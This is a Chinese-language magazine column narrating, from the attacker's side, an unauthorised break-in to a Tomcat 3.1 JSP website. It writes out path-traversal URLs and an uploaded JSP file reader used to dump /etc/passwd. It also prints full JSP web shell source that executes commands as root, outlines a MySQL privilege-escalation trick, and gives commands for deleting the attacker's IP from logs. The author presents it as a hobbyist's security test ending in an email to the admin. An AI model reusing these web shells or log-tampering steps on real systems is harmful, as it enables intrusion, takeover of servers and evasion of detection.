現場紀實：如何入侵基於JSP的網站

js

　　編者：《現場紀實》是駭客攻防專區新推出的小版塊。在這裡我們將陸續為您介紹一些網上駭客入侵的真實案例，與以往從網站安全人員的角度講述不同，這些案例都是從駭客的角度來描述入侵的全過程。通過這些案例，您可以很清楚瞭解到駭客在入侵一個網站時所採用的技術手段及採取的策略。涉及具體技術細節，本欄目會做相應處理，因為我們的目的是通過這樣的技術交流共同提高網路的安全性，而非惡意攻擊他人的電腦。

很偶然的一個機會，瀏覽到一個網站，頁面清新讓人感覺很舒服。網站是用JSP開發的，出於個人愛好，我決定測試一下其系統的安全性。

telnet www.target.com 8080 GET /CHINANSL HTTP/1.1 [Enter] [Enter]

返回的結果如下：

HTTP/1.0 404 Not Found Date: Sun, 08 Jul 2001 07:49:13 GMT Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2 .2.12 i386; java.vendor=Blackdown Java-Linux Team) Content-Language: en Content-Type: text/html Status: 404 〈h1〉Error: 404〈/h1〉 〈h2〉Location: /CHINANSL〈/h2〉File Not Found〈br〉/CHINANSL

獲得了啟動並執行WEBServer的名稱“Tomcat 3.1”。記得曾經發現過這個版本的漏洞，並且post到bugtrap上去過。

回憶一下，大概是通過“..”技術可以退出WEB目錄，於是：

http://target:8080/../../../../%00.jsp （不行） http://target:8080/file/index.jsp （不行） http://target:8080/index.JSP （不行） http://target:8080/index.jsp%81 （不行） http://target:8080/index.js%70 （不行） http://target:8080/index.jsp%2581 （不行） http://target:8080/WEB-INF/ （不行）

看來安全狀況似乎還不錯，我們再來進行一下更深層的測試。Tomcat 3.1內建了一個管理工具，可以查看WEB下的目錄及檔案，並且可以添加context。於是嘗試：

http://target:8080/admin/

管理員果然沒有刪除或禁止訪問這個目錄，從安全的角度說，這點應該算是一個比較重要的失誤。

接著，點擊“VIEW ALL CONTEXT”按鈕，列出了WEB目錄下的一些檔案和目錄的名稱，很快發現了一個上傳檔案的組件，通過這個組件將一個JSP檔案上傳到對方的WEB目錄裡：

〈%@ page import="java.io.*" %〉 〈% String file = request.getParameter("file"); String str = ""; FileInputStream fis = null; DataInputStream dis = null; try{ fis = new FileInputStream(file); dis = new DataInputStream(fis); while(true){ try{ str = dis.readLine(); }catch(Exception e){} if(str == null)break; out.print(str+"〈br〉"); } }catch(IOException e){} %〉

然後執行：

http://target:8080/upload/test.jsp?file=/etc/passwd

密碼出來了。接下來的過程是猜測密碼，沒有成功。不過，現在相當於有了一個SHELL，猜不出密碼可以先把IE當作SHELL環境。

再寫一個JSP檔案：

〈%@ page import="java.io.*" %〉 〈% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close(); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } %〉

然後把這個JSP再通過upload上傳，有SHELL了。

http://target:8080/upload/cmd.jsp?cmd=ls+-la+/ （詳細結果這裡就不列出來了）

怎麼獲得root許可權呢？經過一番搜尋發現系統安裝了MySQL，並且從JSP的原始碼中得到了MySQL的密碼，執行：

sqld"〉http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld

顯示：

root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql

系統是以root身份啟動並執行MySQL。這時我思考了一下，既然知道了MySQL的密碼，那就可以寫一個SHELL程式，讓它建立一個表，然後將我的資料放到表中，再使用“select ... into outfile;”的辦法在系統上建立一個檔案，讓使用者在執行su的時候，運行我的程式。（還記得apache.org有一次被入侵嗎？駭客就採用的這種辦法）。

之後就比較簡單了，上傳bindshell之類的程式，運行、獲得nobody的許可權，使用su root時幫忙建立的setuid shell讓自己成為root。

但是，接下來已經實際操作，結果令人頗感意外：

http://target:8080/upload/cmd.jsp?cmd=id

顯示：

uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)

原來這個WEB SHELL本來就是ROOT！管理員的安全設定工作到底怎麼做的？

http://target:8080/upload/cmd.jsp?cmd=ps+aux 果然是root身份啟動並執行（不列出來了）

剩下的事情：

1、刪除我的telnet記錄。

2、刪除http的日誌。

清除日誌我使用的辦法是：cat xxx |grep -V "IP" 〉〉temp然後在把temp覆蓋那些被我修改過的記錄檔。

說明一點，我沒有更換該網站的頁面，因為我只是個網路安全愛好者。所以，發封郵件告訴system admin吧！當然，我順便在信中提到，如果需要安盟資訊科技為他提供安全服務的話，我們會非常的高興！